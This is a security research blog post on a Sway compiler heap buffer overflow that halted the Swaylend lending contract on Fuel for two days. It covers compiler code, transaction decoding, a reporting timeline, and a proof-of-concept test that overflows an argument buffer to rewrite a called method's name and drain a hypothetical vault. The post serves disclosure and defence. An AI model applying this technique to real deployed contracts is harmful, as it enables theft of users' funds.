A Preventable Two-Day Shutdown Caused by a Compiler Bug

Long Story Short

Compiler vulnerabilities tend to be overlooked because compiler developers may perceive them as either having little to no consequences or being easily avoidable in the final DApps. However, DApps developers, unaware of these compiler bugs, are likely to fail in detecting the unintended effects those bugs have on their products. The information gap between the two groups can lead to severe incidents, resulting in significant financial loss. Notable examples include the Vyper reentrancy bug, which led to the loss of over $26 million in smart contracts.

In this article, we will dive into the details of the Fuel-Swaylend buffer overflow vulnerability, which led to an incident where the contract was halted for 2 days. The story begins with an issue reported by our team during the Fuel Attackathon, an audit competition held on Immunefi, along with 20+ other Sway miscompilation bugs. These bugs, however, were not prioritized for immediate fixing.

Months later, shortly after fuel launched its mainnet, we noticed Swaylend transactions failing with error code 123. This error, which rarely occurs under normal operation, coincided with the impact of one of the compiler bugs we had reported during the Attackathon. Our further investigation confirmed that the bug was indeed the root cause. Consequently, Swaylend was paused until the compiler bug was fixed and a newly recompiled version was deployed. However, a 2-day shutdown had already occurred.

While the bugs we reported were initially not considered high priority, the incident highlighted their potential severity, prompting further attention to these issues. Some of the bugs still remain unresolved, pointing to the need for ongoing vigilance in addressing compiler-related vulnerabilities.

Now, let’s explore the technical details in more depth, shall we? :)

The Incident

Discovery

While casually browsing through fuel transactions, we noticed certain Swaylend transactions were failing with error code 123. This was alarming, as code 123 is reserved for mismatched selector reverts—in other words, calling an unknown function of an external contract.

pub(crate) const MISMATCHED_SELECTOR_REVERT_CODE: u32 = 123;

impl<'a, 'b> EncodingAutoImplContext<'a, 'b>
where
    'a: 'b,
{
    ...
    pub(crate) fn generate_contract_entry(
        &mut self,
        engines: &Engines,
        program_id: Option<ProgramId>,
        contract_fns: &[DeclId<TyFunctionDecl>],
        fallback_fn: Option<DeclId<TyFunctionDecl>>,
        handler: &Handler,
    ) -> Result<TyAstNode, ErrorEmitted> {
        ...
        let fallback = if let Some(fallback_fn) = fallback_fn {
            ...
        } else {
            // as the old encoding does
            format!("__revert({});", MISMATCHED_SELECTOR_REVERT_CODE)
        };
        ...
    }
    ...
}

Such errors rarely occur during normal operation. Moreover, this coincided with an observable artifact of one of the compiler bugs we reported during the Fuel Attackathon, leading us to suspect that it might have a similar root cause. We will walk you through our journey of investigating the issue, as well as highlight key takeaways.

Investigation

Starting with the failing transaction, we first need to gather information on what happened. The Operations section of the transaction provides a simple overview of the events. It shows that the execution begins with a script calling the Sway proxy contract (0x657ab45a6eb98a4893a99fd104347179151e8b3828fd8f2a108cc09770d1ebae), which then calls the Pyth oracle contract (0x1c86fdd9e0e7bc0d2ae1bf6817ef4834ffa7247655701ee1b031b52a24c523da) before reverting. While this is helpful, it doesn’t reveal which function of the Sway contract was called. To determine that, we need to examine the script.

The script, along with the script data, can be obtained from the advanced transaction view. The script itself is quite short, and when plugged into the disassembler, the logic is also fairly straightforward: it simply calls a contract with parameters from the script data.

byte   op                                                                                 notes  
0      MOVI { dst: 0x10, val: 10432 }                                                     point reg 0x10 to param in script data
4      MOVI { dst: 0x11, val: 10392 }                                                     load amount of coins to forward into reg 0x11 from scriptdata
8      LW { dst: 0x11, addr: 0x11, offset: 0 }                                            
12     MOVI { dst: 0x12, val: 10400 }                                                     point reg 0x12 to asset_id in script data          
16     CALL { target_struct: 0x10, fwd_coins: 0x11, asset_id_addr: 0x12, fwd_gas: 0xa }            
20     RET { value: 0x1 }

Let’s examine the script data to identify which functions are called. Looking up the code library, we see target_struct (or params) is the serialization of 3 fields: contract_id, method_name and other function arguments.

pub fn contract_call<T, TArgs>(
    contract_id: b256,
    method_name: str,
    args: TArgs,
    coins: u64,
    asset_id: b256,
    gas: u64,
) -> T
where
    T: AbiDecode,
    TArgs: AbiEncode,
{
    let first_parameter = encode(method_name);
    let second_parameter = encode(args);
    let params = encode((
        contract_id,
        asm(a: first_parameter.ptr()) {
            a: u64
        },
        asm(a: second_parameter.ptr()) {
            a: u64
        },
    ));

    __contract_call(params.ptr(), coins, asset_id, gas);
    let ptr = asm() {
        ret: raw_ptr
    };
    let len = asm() {
        retl: u64
    };

    let mut buffer = BufferReader::from_parts(ptr, len);
    T::abi_decode(buffer)
}

Cross-referencing it with the script data, we find that the contract_id is 0x657ab45a6eb98a4893a99fd104347179151e8b3828fd8f2a108cc09770d1ebae, which matches the call we observed earlier. The method pointer points to the address 0x28f0 which holds the string withdraw_collateral with its length prepended. From the Swaylend contract, we find the function signature for withdraw_collateral is fn withdraw_collateral(asset_id: AssetId, amount: u64, price_data_update: PriceDataUpdate). We then proceed to decode the arguments as (AssetId, u64, PriceDataUpdate). The respective fields are annotated below (type definitions).

0x2890(10384) :                         00 00 00 00 00 00 00 07 
0x28a0(10400) : f8 f8 b6 28 3d 7f a5 b6 72 b5 30 cb b8 4f cc cb 
0x28b0(10416) : 4f f8 dc 40 f8 17 6e f4 54 4d db 1f 19 52 ad 07 
0x28c0(10432) : 65 7a b4 5a 6e b9 8a 48 93 a9 9f d1 04 34 71 79  <- call contract_id (start of encoded params structure)
0x28d0(10448) : 15 1e 8b 38 28 fd 8f 2a 10 8c c0 97 70 d1 eb ae 
0x28e0(10464) : 00 00 00 00 00 00 28 f0 00 00 00 00 00 00 29 0b  <- method ptr / args ptr
0x28f0(10480) : 00 00 00 00 00 00 00 13                          <- method name length
                                        77 69 74 68 64 72 61 77  <- method name ("withdraw_collateral")
0x2900(10496) : 5f 63 6f 6c 6c 61 74 65 72 61 6c 
                                                 f8 f8 b6 28 3d  <- asset_id
0x2910(10512) : 7f a5 b6 72 b5 30 cb b8 4f cc cb 4f f8 dc 40 f8 
0x2920(10528) : 17 6e f4 54 4d db 1f 19 52 ad 07 
                                                 00 00 00 00 00  <- amount 
0x2930(10544) : 0f 42 40 
                         00 00 00 00 00 00 00 07                 <- price_data_update.update_fee = 7
                                                 00 00 00 00 00  <- price_data_update.publish_times = Vec<u64> with len 7
0x2940(10560) : 00 00 07 40 00 00 00 67 24 e0 72 40 00 00 00 67
0x2950(10576) : 24 e0 72 40 00 00 00 67 24 e0 72 40 00 00 00 67 
0x2960(10592) : 24 e0 72 40 00 00 00 67 24 e0 72 40 00 00 00 67 
0x2970(10608) : 24 e0 72 40 00 00 00 67 24 e0 72 
                                                 00 00 00 00 00  <- price_data_update.price_feed_ids = Vec<PriceFeedId> with len 7
0x2980(10624) : 00 00 07
                         ea a0 20 c6 1c c4 79 71 28 13 46 1c e1 
0x2990(10640) : 53 89 4a 96 a6 c0 0b 21 ed 0c fc 27 98 d1 f9 a9 
              :	               ...
0x2a50(10832) : 52 b8 36 45 13 f6 ab 1c ca 5e d3 f1 f7 b5 44 89 
0x2a60(10848) : 80 e7 84 
                         00 00 00 00 00 00 00 01                 <- price_data_update.update_data = Vec<Bytes> with len 1
                                                 00 00 00 00 00  <- price_data_update.update_data[0] = Bytes with len 0xba3
0x2a70(10864) : 00 0b a3
                         50 4e 41 55 01 00 00 00 03 b8 01 00 00 
0x2a80(10880) : 00 04 0d 00 6a 9a 96 8b 05 c6 1c 4e 33 a6 ce d1 
              :                       ...
0x3600(13840) : 37 7e ea 97 08 ec dc 32 d3 1b 6b 0a 97 61 1e b5

Bug Analysis

Now we know withdraw_collateral is called and have the arguments, we are ready to dive into the code. We also know the actual failure occurs when calling the pyth contract, so let’s jump directly to update_price_feed_if_necessary_internal within withdraw_collateral where pyth contract is called. This is when things start getting interesting. The failure happens after calling oracle.update_price_feeds_if_necessary, but Swaylend uses the correct ABI, so what can possibly go wrong?

impl Market for Contract {
    ...
    #[payable, storage(write)]
    fn withdraw_collateral(
        asset_id: AssetId,
        amount: u64,
        price_data_update: PriceDataUpdate,
    ) {
        ...
        // Update price data
        update_price_feeds_if_necessary_internal(price_data_update);
        ...
    }
    ...
}

#[payable, storage(read)]
fn update_price_feeds_if_necessary_internal(price_data_update: PriceDataUpdate) {
    let contract_id = storage.pyth_contract_id.read();
    ...
    let oracle = abi(PythCore, contract_id.bits());
    oracle
        .update_price_feeds_if_necessary {
            asset_id: AssetId::base().bits(),
            coins: price_data_update.update_fee,
        }(
            price_data_update
                .price_feed_ids,
            price_data_update
                .publish_times,
            price_data_update
                .update_data,
        );
}

This brings us to the compiler internals of Fuel. For contract ABI method calls, Fuel automatically translates them into the contract_call function defined in the core library, which we’ve already shown above. So, we can mentally unpack oracle.update_price_feeds_if_necessary into an explicit call instead.

pub(crate) fn type_check_method_application(
    handler: &Handler,
    mut ctx: TypeCheckContext,
    mut method_name_binding: TypeBinding<MethodName>,
    contract_call_params: Vec<StructExpressionField>,
    arguments: &[Expression],
    span: Span,
) -> Result<ty::TyExpression, ErrorEmitted> {
    ...
    if ctx.experimental.new_encoding && method.is_contract_call {
        fn call_contract_call(
            ctx: &mut TypeCheckContext,
            original_span: Span,
            return_type: TypeId,
            method_name_expr: Expression,
            _caller: Expression,
            arguments: Vec<Expression>,
            typed_arguments: Vec<TypeId>,
            coins_expr: Expression,
            asset_id_expr: Expression,
            gas_expr: Expression,
        ) -> Expression {
            ...
            Expression {
                kind: ExpressionKind::FunctionApplication(Box::new(
                    FunctionApplicationExpression {
                        call_path_binding: TypeBinding {
                            inner: CallPath {
                                prefixes: vec![],
                                suffix: Ident::new_no_span("contract_call".into()),
                                is_absolute: false,
                            },
                            type_arguments: TypeArgs::Regular(vec![
                                TypeArgument {
                                    type_id: return_type,
                                    initial_type_id: return_type,
                                    span: Span::dummy(),
                                    call_path_tree: None,
                                },
                                TypeArgument {
                                    type_id: tuple_args_type_id,
                                    initial_type_id: tuple_args_type_id,
                                    span: Span::dummy(),
                                    call_path_tree: None,
                                },
                            ]),
                            span: Span::dummy(),
                        },
                        resolved_call_path_binding: None,
                        arguments: vec![
                            Expression {
                                kind: ExpressionKind::Literal(Literal::B256([0u8; 32])),
                                span: Span::dummy(),
                            },
                            method_name_expr,
                            as_tuple(arguments),
                            coins_expr,
                            asset_id_expr,
                            gas_expr,
                        ],
                    },
                )),
                span: original_span,
            }
        }
        ...
        let contract_call = call_contract_call(
            &mut ctx,
            span,
            method.return_type.type_id,
            string_slice_literal(&method.name),
            old_arguments.first().cloned().unwrap(),
            args,
            arguments.iter().map(|x| x.1.return_type).collect(),
            coins_expr,
            asset_id_expr,
            gas_expr,
        );
        ...
    }
    ...
}

contract_call is responsible for several tasks: serializing the arguments, calling the external contract, and then deserializing the return value. The panic occurred when an external contract was called and the function name could not be found. This indicates either the serialized function name provided to the external contract is incorrect, or the function dispatching in the external contract does not work properly.

Before we dig further into the Swaylend incident, let’s take a step back and discuss the compiler bug we mentioned earlier, which we discovered during the Fuel Attackathon. This will provide important context for the Swaylend case when we revisit it later.

The codec library defines a trait called AbiEncode used for encoding data. Any structures passed across contract boundaries must implement this trait for the compiler to be able to serialize it.

1
2
3

pub trait AbiEncode {
    fn abi_encode(self, buffer: Buffer) -> Buffer;
}

At the core of the trait is a Buffer structure, which is used to track encoded data. A Buffer is created with the __encode_buffer_empty intrinsic, and serialized structure bytestreams are appended to it through the __encode_buffer_append intrinsic. Once encoding is complete, the Buffer is destructured into a raw_slice using the encode_buffer_as_raw_slice intrinsic.

pub struct Buffer {
    buffer: (raw_ptr, u64, u64), // ptr, capacity, size
}

impl Buffer {
    pub fn new() -> Self {
        Buffer {
            buffer: __encode_buffer_empty(),
        }
    }
}

impl AbiEncode for bool {
    fn abi_encode(self, buffer: Buffer) -> Buffer {
        Buffer {
            buffer: __encode_buffer_append(buffer.buffer, self),
        }
    }
}

pub fn encode<T>(item: T) -> raw_slice
where
    T: AbiEncode,
{
    let buffer = item.abi_encode(Buffer::new());
    buffer.as_raw_slice()
}

impl AsRawSlice for Buffer {
    fn as_raw_slice(self) -> raw_slice {
        __encode_buffer_as_raw_slice(self.buffer)
    }
}

While the usage of all these intrinsics may seem overwhelming at first, the compiler implementations are actually quite simple.

In EncodeBufferEmpty, the compiler allocates a memory chunk of size 1024, and packs the (ptr, capacity = 1024, len = 0) tuple into the Buffer structure before returning it.

Intrinsic::EncodeBufferEmpty => {
    assert!(arguments.is_empty());

    let uint64 = Type::get_uint64(context);

    // let cap = 1024;
    let cap = Value::new_constant(
        context,
        Constant {
            ty: uint64,
            value: ConstantValue::Uint(1024),
        },
    );

    // let ptr = asm(cap: cap) {
    //  aloc cap;
    //  hp: u64
    // }
    let args = vec![AsmArg {
        name: Ident::new_no_span("cap".into()),
        initializer: Some(cap),
    }];
    let body = vec![AsmInstruction {
        op_name: Ident::new_no_span("aloc".into()),
        args: vec![Ident::new_no_span("cap".into())],
        immediate: None,
        metadata: None,
    }];
    let ptr = self.current_block.append(context).asm_block(
        args,
        body,
        uint64,
        Some(Ident::new_no_span("hp".into())),
    );

    let ptr_u8 = Type::new_ptr(context, Type::get_uint8(context));
    let ptr = self.current_block.append(context).int_to_ptr(ptr, ptr_u8);

    let len = Constant::new_uint(context, 64, 0);
    let len = Value::new_constant(context, len);
    let buffer = self.compile_to_encode_buffer(context, ptr, cap, len)?;
    Ok(TerminatorValue::new(buffer, context))
}

Appending to the Buffer is slightly more involved, but it can be broken down into a few simple steps

Calculate the address of &Buffer.ptr[Buffer.len]
Store the encoded data at the calculated address.
Increase Buffer.len

Intrinsic::EncodeBufferAppend => {
    assert!(arguments.len() == 2);

    let buffer = &arguments[0];
    let buffer = return_on_termination_or_extract!(
        self.compile_expression_to_value(context, md_mgr, buffer)?
    );

    let (ptr, cap, len) = self.compile_buffer_into_parts(context, buffer)?;

    // Append item
    let item = &arguments[1];
    let item_span = item.span.clone();
    let item_type = engines.te().get(item.return_type);
    let item = return_on_termination_or_extract!(
        self.compile_expression_to_value(context, md_mgr, item)?
    );

    // Define some helper functions
    fn increase_len(
        current_block: &mut Block,
        context: &mut Context,
        len: Value,
        step: u64,
    ) -> Value {
        assert!(len.get_type(context).unwrap().is_uint64(context));

        let uint64 = Type::get_uint64(context);
        let step = Value::new_constant(
            context,
            Constant {
                ty: uint64,
                value: ConstantValue::Uint(step),
            },
        );
        current_block
            .append(context)
            .binary_op(BinaryOpKind::Add, len, step)
    }

    fn calc_addr_as_ptr(
        current_block: &mut Block,
        context: &mut Context,
        ptr: Value,
        len: Value,
        ptr_to: Type,
    ) -> Value {
        assert!(ptr.get_type(context).unwrap().is_ptr(context));
        assert!(len.get_type(context).unwrap().is_uint64(context));

        let uint64 = Type::get_uint64(context);
        let ptr = current_block.append(context).ptr_to_int(ptr, uint64);
        let addr = current_block
            .append(context)
            .binary_op(BinaryOpKind::Add, ptr, len);

        let ptr_to = Type::new_ptr(context, ptr_to);
        current_block.append(context).int_to_ptr(addr, ptr_to)
    }

    fn append_with_store(
        current_block: &mut Block,
        context: &mut Context,
        addr: Value,
        len: Value,
        item: Value,
    ) -> Value {
        assert!(addr.get_type(context).unwrap().is_ptr(context));
        assert!(addr
            .get_type(context)
            .unwrap()
            .get_pointee_type(context)
            .unwrap()
            .eq(context, &item.get_type(context).unwrap()));

        let _ = current_block.append(context).store(addr, item);

        let uint64 = Type::get_uint64(context);
        let step = Value::new_constant(
            context,
            Constant {
                ty: uint64,
                value: ConstantValue::Uint(1),
            },
        );
        current_block
            .append(context)
            .binary_op(BinaryOpKind::Add, len, step)
    }

    // Actual operation starts from here
    let new_len = match &*item_type {
        TypeInfo::Boolean => {
            assert!(item.get_type(context).unwrap().is_bool(context));
            let addr = calc_addr_as_ptr(
                &mut self.current_block,
                context,
                ptr,
                len,
                Type::get_bool(context),
            );
            append_with_store(&mut self.current_block, context, addr, len, item)
        }
        ...
    }

    let buffer = self.compile_to_encode_buffer(context, ptr, cap, new_len)?;

    Ok(TerminatorValue::new(buffer, context))
}

And EncodeBufferAsRawSlice packs Buffer.ptr and Buffer.len into a raw_slice structure.

Intrinsic::EncodeBufferAsRawSlice => {
    assert!(arguments.len() == 1);

    let buffer = &arguments[0];
    let buffer = return_on_termination_or_extract!(
        self.compile_expression_to_value(context, md_mgr, buffer)?
    );

    let uint64 = Type::get_uint64(context);
    let (ptr, _, len) = self.compile_buffer_into_parts(context, buffer)?;
    let ptr = self.current_block.append(context).ptr_to_int(ptr, uint64);
    let slice_as_tuple = self.compile_tuple_from_values(
        context,
        vec![ptr, len],
        vec![uint64, uint64],
        None,
    )?;

    //asm(s: (ptr, len)) {
    //  s: raw_slice
    //};
    let return_type = Type::get_slice(context);
    let buffer = self.current_block.append(context).asm_block(
        vec![AsmArg {
            name: Ident::new_no_span("s".into()),
            initializer: Some(slice_as_tuple),
        }],
        vec![],
        return_type,
        Some(Ident::new_no_span("s".into())),
    );

    Ok(TerminatorValue::new(buffer, context))
}

It is clear that EncodeBufferAppend contains a critical bug: the buffer is never resized when the encoded data exceeds the original buffer length. If the encoded data is large, the append operation will silently overflow the allocated heap memory and overwrite subsequent data.

So, what consequences could this bug have? To answer that, we need to understand what lies after the overflown data chunk. The Fuel VM heap grows from high memory towards low memory and never garbage collects. Thus chunks allocated later are always placed at lower memory addresses than those allocated earlier. As a result, a sufficiently large overflow on a newer chunk can always overwrite data in an older chunk.

         Fuel VM Heap Layout
+-----------------------------------+ <- High Memory (Start of Heap)
|  Older Allocated Chunks           |
|  .                                |  ⬆
|  .                                |  ⬆ (overflow old chunks)
|  .                                |  ⬆
+-----------------------------------+  ⬆
|  Newer Allocated Chunk            |  ⬆ writing direction
+-----------------------------------+ 
|  (Free Space)                     |
|                                   |
+-----------------------------------+ <- Low Memory (End of Heap)

In contract_call, we can identify 3 encodings at play. The method_name is generally hardcoded and short, making it is unlikely to overflow during encoding. On the other hand, the args are often user-controllable and can have dynamic lengths, thus susceptible to overflow. The same applies to params. Since method_name is encoded before args, the heap chunk in the Buffer for the first_parameter (method_name) precedes the heap chunk in the Buffer for second_parameter (args). This means a sufficiently long arg can overflow during execution and overwrite the method_name being called, resulting in the unknown function name error we observed.

Returning to Swaylend, is this what has happened? Close, but not exactly. It turns out the Fuel team has attempted to fix this bug at one point. In this commit, they added code to double the size of the Buffer whenever it runs out of space. Unfortunately, doubling the buffer size was not enough to fully resolve the bug. Take the failing transaction as example, the final field to serialize is 0xba3 bytes, and the entire param exceeds 0xc00 bytes. Since Doubling the 1024-bytes Buffer to 2048-bytes is not enough to store the entire param, the encoding still overflow into method_name, corrupting it.

The End of the Story?

Reverting when it shouldn’t is bad enough on its own. But hold on—does an overflow always end with a revert? Let’s consider the bug more carefully. What if attackers craft their overflowing encoded argument carefully to control the method_name, directing it to an existing function rather than some corrupted data? The hypothetical DApp below demonstrates how this could turn the bug into a serious loss-of-funds issue. Readers are encouraged to take some time with this to truly understand how the bug works 0.<

contract;

use std::{
    bytes::Bytes,
    identity::Identity,
    asset::transfer,
    asset_id::AssetId,
    context::this_balance,
    auth::msg_sender,
};

abi VaultContract {
    #[storage(write)]
    fn initialize(manager:Identity);
    #[payable, storage(read)]
    fn deposit(data: Bytes);
    #[storage(read)]
    fn collect(amount: u64, receiver: Identity);
}

storage {
    manager: Identity = Identity::Address(Address::zero()),
    initialized: bool = false,
}

impl VaultContract for Contract {
    #[storage(write)]
    fn initialize(manager: Identity) {
        assert(storage.initialized.read() == false);
        storage.initialized.write(true);
        storage.manager.write(manager);
    }
    #[payable, storage(read)]
    fn deposit(data: Bytes) {
        assert(msg_sender().unwrap() == storage.manager.read());
        //ignore the bookkeeping of user balance since it's not important for the poc
        log(data);
    }
    #[storage(read)]
    fn collect(amount: u64, receiver: Identity) {
        assert(msg_sender().unwrap() == storage.manager.read());
        let mut actual_amount = amount;
        if (actual_amount > this_balance(AssetId::base())) {
            actual_amount = this_balance(AssetId::base());
        }
        transfer(receiver, AssetId::base(), actual_amount);
    }
}

contract;

use std::{
    bytes::Bytes,
    alloc::alloc,
    asset_id::AssetId,
    registers::global_gas,
    identity::Identity,
    address::Address,
    contract_id::ContractId,
    auth::msg_sender,
    call_frames::msg_asset_id,
    context::{
        msg_amount,
        balance_of,
    },
};

abi VaultContract {
    #[storage(write)]
    fn initialize(manager:Identity);
    #[payable, storage(read)]
    fn deposit(data: Bytes);
    #[storage(read)]
    fn collect(amount: u64, receiver: Identity);
}

abi ManagerContract {
    #[payable]
    fn deposit(data: Bytes);
    #[storage(read)]
    fn collect(amount: u64, receiver: Identity);
}

storage {
    admin: Identity = Identity::Address(Address::zero()),
}

impl ManagerContract for Contract {
    #[payable]
    fn deposit(data: Bytes) {
        assert(msg_asset_id() == AssetId::base());
        let vault_abi = abi(VaultContract, vault::CONTRACT_ID);
        vault_abi.deposit{asset_id: AssetId::base().bits(), coins: msg_amount()}(data);
    }

    #[storage(read)]
    fn collect(amount: u64, receiver: Identity) {
        assert(msg_sender().unwrap() == storage.admin.read());
        let vault_abi = abi(VaultContract, vault::CONTRACT_ID);
        vault_abi.collect(amount, receiver);
    }
}

#[test]
fn test() {
   // setup
   let vault_abi = abi(VaultContract, vault::CONTRACT_ID);
   vault_abi.initialize(Identity::ContractId(ContractId::from(CONTRACT_ID)));
   let manager_abi = abi(ManagerContract, CONTRACT_ID);
   manager_abi.deposit{asset_id: AssetId::base().bits(), coins: 100}(Bytes::new());
   assert(balance_of(ContractId::from(vault::CONTRACT_ID), AssetId::base()) == 100);

   // exploit
   let arg_len = 0x408;
   let arg = alloc::<u8>(8 + arg_len);
   arg.write::<u64>(arg_len);
   arg.add_uint_offset(0x3f8).write::<u64>(15); //overwrite name encode buffer length
   arg.add_uint_offset(0x400).write::<u64>(7); //overwrite name length
   arg.add_uint_offset(0x408).write::<u64>(0x636f6c6c65637400); //overwrite name
   __contract_call(
       encode((
           CONTRACT_ID,
           asm(a:encode("deposit").ptr()){a:u64},
           asm(a:arg){a:u64},
       )).ptr(),
       0, 
       AssetId::base().bits(),
       global_gas(),
   );
   assert(balance_of(ContractId::from(vault::CONTRACT_ID), AssetId::base()) == 100); //this fails because the overflow stole the coins
}

Besides controlling the method_name to redirect code execution, other attack vectors also exist. Since the overflow doesn’t necessarily stop at the method_name buffer, if there is other data placed on the heap before the call, attacker could tamper that as well. The potential of powerful exploits surrounding this bug is truly unlimited.

On the bright side for Swaylend, the Pyth contract they’re calling doesn’t have any functionality that could enable a more severe attack. Additionally, there’s also no useful data on the heap for an attacker to corrupt. This limits the impact of the bug to only transaction failures. However, other DApps may not be as fortunate. Our suggestion to Sway developers is to review your code to ensure there are no dynamic-length arguments passed between contracts. If so, recompile your contract with the latest version of the Sway compiler and upgrade it immediately.

Reflection

So, what can we learn from the incident, and why do we call this a “preventable” issue?
Let’s take a look at the reporting timeline:

6/19 : We reported the compiler bug to Fuel via Immunefi, but the report was automatically closed because the contest didn’t include an appropriate impact option. The custom impact we provided—“Incorrect Sway intrinsics leading to Fuel heap buffer overflow”—was deemed out of scope
7/1 : We reached out to Immunefi and received a response that they would ask Fuel to review the reports that were automatically, but incorrectly, closed
8/23 : Long after the end of the Attackathon, we reminded Immunefi and Fuel the report had not been reviewed
8/26 : The report was once again automatically closed due to “out of scope” impacts
8/30 : The report was accepted, but its severity was downgraded from Critical to Low
8/30 : We provided the proof of concept DApp above to strengthen our claim that the bug could have severe impacts, but were unable to convince Fuel and Immunefi to reassess its severity
10/31: Two month later, we noticed transactions failing with error code 123 (mismatched selector reverts)
11/1 : Swaylend was halted
11/3 : Swaylend was recompiled and upgraded in this transaction

Compiler bug severities can be a source of contention. The main arguments for assigning a lower severity are:

Compiler bugs rarely make it to production. They are typically caught by DApp developers during testing and can easily be identified and fixed.
Compiler bugs don’t have an immediate impact, so by nature, they can’t be considered severe.
It’s uncommon for DApps to encounter compiler bugs, as code that triggers them often involves anti-patterns.

On the other hand, the counterarguments for high severity are:

It is unreasonable to expect DApp developers to catch compiler bugs during testing. Testing coverage is often insufficient, and even with high coverage, bugs may still go undetected.
Programming languages are meant to provide developers with a trusted foundation. If developers cannot rely on a language to function as intended, building anything useful becomes impossible.
Nearly all miscompilations have the potential to lead to critical consequences. If not taken seriously, it’s only a matter of time before compiler bugs result in significant losses.

While the consequences of compiler bugs are still up for debate, we want to highlight that negligence in compiler security has already had visible impacts in the industry. A few well-known examples include:

The Vyper reentrancy bug => over $26 million stolen.
The ZKSync-Aave optimization bug => fortunately identified before activation.
The Fuel-Swaylend buffer overflow vulnerability => Swaylend halted for 2 days.

Although it is common for people to underestimate the potential impact of vulnerabilities yet to occur, recent examples demonstrate our industry has reached a point where imminent threats, such as compiler issues, are looming. A certain portion of related incidents could likely have been avoided if reported vulnerabilities had received more attention and if security researchers had been more actively engaged in the process of reviewing fixes.

Bugs are an inherent part of the development process, and determining the timing and approach for addressing them is a crucial decision. The more seriously security bugs are handled, the less likely they are to come back to bite us later. If you are concerned about compiler bugs affecting your contracts or need help assessing the risks, contact us at th3.anatomist@gmail.com. We can help you conduct the most thorough and rigorous review.

In our next post, we will dive into the Sway compiler, breaking down the pipeline of modern compilers and examining the bugs we discovered during the Attackathon. Feel free to follow us on X to stay tunned!